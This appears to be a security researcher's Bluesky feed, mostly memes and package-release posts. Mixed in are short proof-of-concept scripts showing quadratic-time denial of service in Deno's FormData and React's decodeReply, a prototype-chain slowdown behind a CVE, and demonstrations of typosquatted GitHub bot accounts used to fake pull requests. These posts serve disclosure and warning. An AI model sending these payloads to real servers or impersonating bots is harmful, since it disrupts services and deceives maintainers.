Sign in

jviide.iki.fi

@jviide.iki.fi
382 followers 31 following 178 posts

cybersecurity charlatan ⋅ quadratic blowhard

PostsRepliesMedia
jviide.iki.fi @jviide.iki.fi · 07/10/2026
patak.agent
Zorro wearing a fedora, holding a gun and smoking a cigarette. The image colors are bluish and washed-out.
190
jviide.iki.fi @jviide.iki.fi · 01/10/2026
Preact v11 is an amazing release! Kudos to the whole @preactjs.com team, with special shoutouts to @jovidecroock.com and @rschristian.dev, who have gone above and beyond to make this a killer release (both literally and figuratively).
A horizontal bar chart comparing Preact 10.29.8 with 11.0.0 with the headline: "Alignment: 11.0.0 has committed 99.8% fewer felonies*".

Below that: "Felony Bench counts indictable offenses per release line from first publish to today. Lower is better." Word "Lower" is suspiciously slightly off, as if there used to be some other word there before.

Counts for v10 versus v11:
preact: 1,847 vs 3, down 99.8%.
preact/hooks: 612 vs 0, down 100%.
preact/compat: 2,206 vs 1, down 99.9%.
preact/debug: 0 vs 0.

Footnote: "Early days. v10 had six years and 29 minor releases to offend. Given the chance, v11 will kill again."

Footer: Felony Bench 0.3.1, Chromium 153.0.8010.12. Misdemeanors (console warnings) excluded. Counts are allegations, not convictions.
1302
jviide.iki.fi @jviide.iki.fi · 25/09/2026
GitHub Universe'26 ad that appeared on the github.com dashboard. On the top of the ad, a GitHub mascot is smiling and looking left and up. A text follows:

"Universe'26

New GitHub Universe sessions just dropped. IRL passes are going fast."

At the end, there is a "Register now" button.GitHub Universe'26 ad that appeared on the github.com dashboard, but the GitHub mascot is replaced with the Awkward Look Monkey Puppet giving a side-eye.
0161
jviide.iki.fi @jviide.iki.fi · 24/09/2026
Giorgio A. Tsoukalos in the "ALIENS" meme template image, without the text "ALIENS".
030
jviide.iki.fi @jviide.iki.fi · 23/09/2026
A part of Bluesky's UI showing 30+ notifications waiting. Below, Ralph Wiggum from Simpsons sits in a bus with the caption: "(chuckles) I'm in danger"
0310
jviide.iki.fi @jviide.iki.fi · 23/09/2026
Claude Code explaining why it changed three files.
A pale fish (?) with a large round sac. A Wikipedia-style caption reads: "The horngus of a dongfish is attached by a scungle to a kind of dillsack (the nutte sac)", followed by citation [77].
323427
jviide.iki.fi @jviide.iki.fi · 06/09/2026
I don't see any way someone could misuse this GitHub functionality.
GitHub's dialog for adding people to the repo "my-secret-repo". The user has written "daniel roe" to the "Search by username, full name, or email" field. The top suggestion is the GitHub user jviide who just happens to have their display name set to "Daniel Roe". The real Daniel Roe's account is the second suggestion.
1220
jviide.iki.fi @jviide.iki.fi · 09/08/2026
Our top researchers are cooperating with the authorities to conduct a thorough press release.
Command line prompt: "~/sandbox $ cd .."
0332
jviide.iki.fi @jviide.iki.fi · 17/07/2026
040
jviide.iki.fi @jviide.iki.fi · 10/07/2026
I sometimes wonder how many "local" containerized services are accidentally exposed to the internet because of this. See also: docs.docker.com/engine/netwo...
A warning in the Docker Compose documentation (https://docs.docker.com/reference/compose-file/services/): "If you do not specify a host IP (such as 127.0.0.1), Docker binds to all interfaces (0.0.0.0), bypassing host firewall rules. This can expose the container directly to the internet if the host has a public IP address. For more information, see Port publishing and mapping."
3161
jviide.iki.fi @jviide.iki.fi · 09/07/2026
A SUCCULENT MAINTENANCE DAY???
Jack Karlson of the "What is the charge? Eating a meal? A succulent Chinese meal?" fame.
1260
jviide.iki.fi @jviide.iki.fi · 03/07/2026
My precious.
A hand holding the DVD box for the movie Onsen Shark.
070
jviide.iki.fi @jviide.iki.fi · 01/07/2026
The way is shut.
A lone goose sitting in the middle of an intersection of two dirt roads.
090
jviide.iki.fi @jviide.iki.fi · 23/06/2026
You and me both, buddy.
A balcony with composite decking. Around the middle of the image is a metal decking clip.The metal decking clip, zoomed.A close-up of the decking clip that looks somewhat like a person facing an existential crisis.
090
jviide.iki.fi @jviide.iki.fi · 10/06/2026
We interrupt our regularly scheduled programming to bring you this important message.
There is exactly 1 instance of the letter "f" in the phrase "There is sauerkraut in my lederhosen" (in the word "for").
260
jviide.iki.fi @jviide.iki.fi · 29/05/2026
fafalef
ho many instances of "f" are there in the word falafel?

Google's AI answer: There are 3 instances of the letter "f" in the word falafel (fafalef).
010
jviide.iki.fi @jviide.iki.fi · 29/05/2026
"A father and son were in a car accident where the father was killed. The ambulance brought the son to the hospital. He needed immediate surgery. In the operating room, a doctor came in and looked at the little boy and said, 'I can't operate on him; I'm Jeremy Renner, the popular Hollywoord actor.' Who is the doctor?'

Google's AI answer: The doctor is the boy's mother.
360
jviide.iki.fi @jviide.iki.fi · 29/05/2026
"A father and son were in a car accident where the father was killed. The ambulance brought the son to the hospital. He needed immediate surgery. In the operating room, a doctor came in and looked at the little boy and said, 'I can't operate on him; I'm Jeremy Renner, the popular Hollywoord actor.' Who is the doctor?'

Google AI's answer: The doctor is the boy's mother.
010
jviide.iki.fi @jviide.iki.fi · 21/05/2026
Whee! Published @badrap/valita v0.5.2 using both trusted & staged publishing just now insert party emoji here
npmjs.com's Staged Packages tab, listing @badrap/valita v0.5.2 waiting for approval. The mouse cursor is hovering over the Approve button.
0242
jviide.iki.fi @jviide.iki.fi · 12/05/2026
For example React's server-side action payload deserializer can call FormData.delete. 2/3
import { decodeReply } from "react-server-dom-webpack/server.node";

// Client-side: generate a React Server Components payload 
// that fits in 1 megabyte when urlencoded.
const data = new FormData();
data.append(`0`, '"$K"');
for (let i = 0; i < 333_333; i++) {
  data.append(`__`, "");
}

// Server-side: Feed the form data to `decodeReply` and time it.
console.time("decodeReply");
await decodeReply(data, {});
console.timeEnd("decodeReply");

-----
  
$ node --conditions react-server poc-02.mjs
decodeReply: 66.732ms

$ deno --conditions react-server --allow-all poc-02.mjs
decodeReply: 32960ms
320
jviide.iki.fi @jviide.iki.fi · 12/05/2026
Deno’s FormData, URLSearchParams + Headers show O(n²) behavior in .set()/.delete() when many repeated keys are present. Example: FormData.delete("_") on ~1MB of _=&_=&_=&... Node: ~4ms Deno: ~74s Could turn otherwise reasonable cleanup of untrusted request data into a potential DoS vector. 1/3
// Client-side: Create form data that can be urlencoded into
// 1 megabyte as _&_&_&_&_&_&_&_&_&_&_&_&_&_&_...
const formData = new FormData();
for (let i = 0; i < 500_000; i++) {
  formData.append("_", "");
}

// Server-side: Sanitize the form data a bit by removing entries
// with key "_"
console.time("formData.delete");
formData.delete("_");
console.timeEnd("formData.delete");

-----
  
$ node poc.mjs
formData.delete: 3.983ms

$ deno poc.mjs
formData.delete: 73828ms
2110
jviide.iki.fi @jviide.iki.fi · 11/05/2026
More companies, governmental organizations and community projects should adopt the security.txt convention/proposal: securitytxt.org Making security contact discovery as easy as possible is good for everyone. Yes, even within the context of the recent AI vulnerability report slopocalypse.
Google's security.txt:

Contact: https://g.co/vulnz
Contact: mailto:security@google.com
Encryption: https://services.google.com/corporate/publickey.txt
Acknowledgments: https://bughunters.google.com/
Policy: https://g.co/vrp
Hiring: https://g.co/SecurityPrivacyEngJobs
Expires: 2030-04-01T00:00:00z
0225
jviide.iki.fi @jviide.iki.fi · 06/05/2026
Switched @badrap/valita to ESM-only, pretty cool how @npmx.dev celebrates the package size reduction 🎉 npmx.dev/package/@bad...
A notice on the @badrap/valita v0.5.0 page on npmx.dev:

"Package size decreased sinve v0.4.6! 🎉

Install size reduced by 72% (369.4 kB smaller)"
0557
jviide.iki.fi @jviide.iki.fi · 28/04/2026
Some personal news:
Sleep Score: Very High

You hit your bedtime and earned a 99. Nicely done.
0120
jviide.iki.fi @jviide.iki.fi · 27/04/2026
Announcing the general availability of Schrödinger's Pull Requests
The pull request page of the npmx-dev/npmx.dev GitHub repository. The tab shows that there are 97 pull requests, while the filtered view shows that there are 0 open and 0 closed pull requests.
2394
jviide.iki.fi @jviide.iki.fi · 20/04/2026
There's highly personalized phishing, and then there's this.
Subject: Your Order Is On the Way

Dear Customer,

Great news — your order has been shipped and is currently on its way to you.

You can check your tracking number and full shipping details by clicking the button below: View Shipping Details

Thank you for shopping with us.

Best regards,
Customer Support Team
1150
jviide.iki.fi @jviide.iki.fi · 17/04/2026
Sometimes notifications can be delightful.
An iPhone notification about a new QAA post, titled "De-Extinction Nightmare Part 1: Nazi Cows (E386)"
0322
jviide.iki.fi @jviide.iki.fi · 14/04/2026
A career highlight for sure!
A Bluesky notification: "Socrates followed you"
0120
jviide.iki.fi @jviide.iki.fi · 10/04/2026
A gentle reminder that while `pnpm install` (or `bun install`) doesn't run the lifecycle scripts of the dependencies by default, it *does* run them from the repo's own package.json. Let's be mindful when cloning and exploring all those new & exciting projects on our local machines.
A package.json with the "prepare" script "compromise-the-supply-chain".
2256
jviide.iki.fi @jviide.iki.fi · 05/04/2026
”FATHER WHY MUST I EXIST”
Two low-quality little Easter chick decorations in the Easter grass.A close-up of one of the decorations, looking very mangled.
090
jviide.iki.fi @jviide.iki.fi · 30/03/2026
Oh cool, the user doesn't even have to typo anything.
The fake depenbadot (with the display name "Dependabot" shown more prominently) is the second auto-suggestion when you write "dependabot" into an invite dialog.
030
jviide.iki.fi @jviide.iki.fi · 30/03/2026
This one.
The fake "Dependabot" circled with red and annotated as "FAKE".
130
jviide.iki.fi @jviide.iki.fi · 30/03/2026
GitHub's auto-suggest using the display names instead of the account names isn't really doing us any favors. The latter "Dependabot" here is our beloved, and very fake, depenbadot.
A GitHub invite dialog, with a typoed prefix "depenba", auto-suggesting two accounts. The latter account is a fake "Dependabot".
151
jviide.iki.fi @jviide.iki.fi · 23/03/2026
The usename "renevatebot" is available on GitHub.
010
jviide.iki.fi @jviide.iki.fi · 23/03/2026
However it's kinda worrying that "copliot", "copllot" etc. were already taken.
The GitHub organization "copllot", with its name set to "COPILOT".
040
jviide.iki.fi @jviide.iki.fi · 23/03/2026
With their trusty sidekick, Dependobat!
The name "dependobat" is available on GitHub.
270
jviide.iki.fi @jviide.iki.fi · 23/03/2026
Dependobat agrees!
The username "dependobat" is available on GitHub.
000
jviide.iki.fi @jviide.iki.fi · 23/03/2026
Worry not, Coplllot is on the case.
A pull request from GitHub user Coplllot.
1120
jviide.iki.fi @jviide.iki.fi · 23/03/2026
You can create pretty convincing pull requests with something like this. Just sayin'.
A pull request from this fake "depenbadot" that looks a lot like a regular Dependabot dependency update PR.
1181
jviide.iki.fi @jviide.iki.fi · 23/03/2026
It's, uh, less than ideal that I'm allowed to claim a GitHub username like this.
A typosquatted Dependabot username "depenbadot" with the bio "Automated dependency updates built into GitHub".
8563
jviide.iki.fi @jviide.iki.fi · 21/03/2026
Been a paying user since May 2024. Currently on the Professional plan. Can recommend. The ability to block/downrank/uprank/pin domains (kagi.com/stats?stat=i...) along with the slop filtering features alone are worth the price of admission for me.
SlopStop: Kagi SlopStop is a community-driven project that allows users to flag websites they believe are AI generated. 

Exclude AI slop from media search: Best-effort identification and removal of AI generated content from image and video search results.

Exclude AI slop from web search: Best-effort identification and removal of AI generated content from web search results.
120
jviide.iki.fi @jviide.iki.fi · 11/03/2026
Okay, so it turns this is really, really slow. Which led to CVE-2026-30226: github.com/sveltejs/dev... Thanks to @ell.iott.dev and the rest of the @svelte.dev team for a well-handled vuln process, a pleasure as always 🫡
The following code and timing info:

```
let obj = {};
for (let i = 0; i < 500_000; i++) {
  obj = { __proto__: obj };
}

// $ time node protobomb.js
// real    23m 38.84s
// user    23m 37.54s
// sys     0m 0.54s
```
1170
jviide.iki.fi @jviide.iki.fi · 12/01/2026
AND THEY EXPECT US TO BELEIVE THIS IS "JUST A COINCIDENCE" ?? !?
A graph by National Agriculture Statistics service: "Actual and Trend Yields for Corn" (with the years 1886-2022 crudely crossed over).
040
jviide.iki.fi @jviide.iki.fi · 12/01/2026
OPEN YOU'RE EYES 👁️👄👁️
Two graphs, the first one being "Preact.js downloads over time" 2015-2025, the other being "UFO sightings over time" 1940-2015, showing a vaguely similar increasing trend over time.
1687
jviide.iki.fi @jviide.iki.fi · 08/01/2026
Pretty cool that you have to create a Facebook account to file a vulnerability report to Meta.
Meta's "Want to subscribe or contibue using our Producs free of charge with ads?" dialog that forces you to choose between subscribing for 5.99€/month and having your data being processed for ads.
050
jviide.iki.fi @jviide.iki.fi · 30/12/2025
Turns out that the gym app has a Year in Review feature, and I'm now contemplating a side hustle as a part-time nutcracker.
A screenshot of the gym app telling "your strongest muscle group is glutes", accompanied by a diagram highlighting those muscles.
130
jviide.iki.fi @jviide.iki.fi · 12/12/2025
In the end, it would be best if NPM just blocked TOTP reuse. TOTP stands for “Time-based One-Time Password,” after all. The “one-time” property is important enough to account for 50% of the acronym. 🙂 Even the spec explicitly calls for blocking reuse: datatracker.ietf.org/doc/html/rfc... 6/6
A quote from RFC 6238: "The verifier MUST NOT accept the second attempt of the OTP after the successful validation has been issued for the first OTP, which ensures one-time only use of an OTP."
0103
jviide.iki.fi @jviide.iki.fi · 02/12/2025
I must go, my people need me. (Nintendo Museum, Kyoto)
Super Mario style warp pipe, with two feet sticking out of it.
030
jviide.iki.fi @jviide.iki.fi · 17/09/2025
Pay special attention to "Automation" and "Publish" token types, as they aren't scoped and allow writes. They also never expire. "Granular" ones are trickier. They MAY be read-only or tightly scoped. It's hard to tell, as the token page doesn't show this info. Their lifetimes can also be very long.
The npmjs.com Access Token page showing one granular token that expires in the year 123456.
110
jviide.iki.fi @jviide.iki.fi · 17/09/2025
This was a very good read. It's also a good reminder to check our own NPM access token pages and maybe delete old lingering tokens.
The npmjs.com Access Token page. The user dropdown menu is open, with the "Access Tokens" link highlighted.
152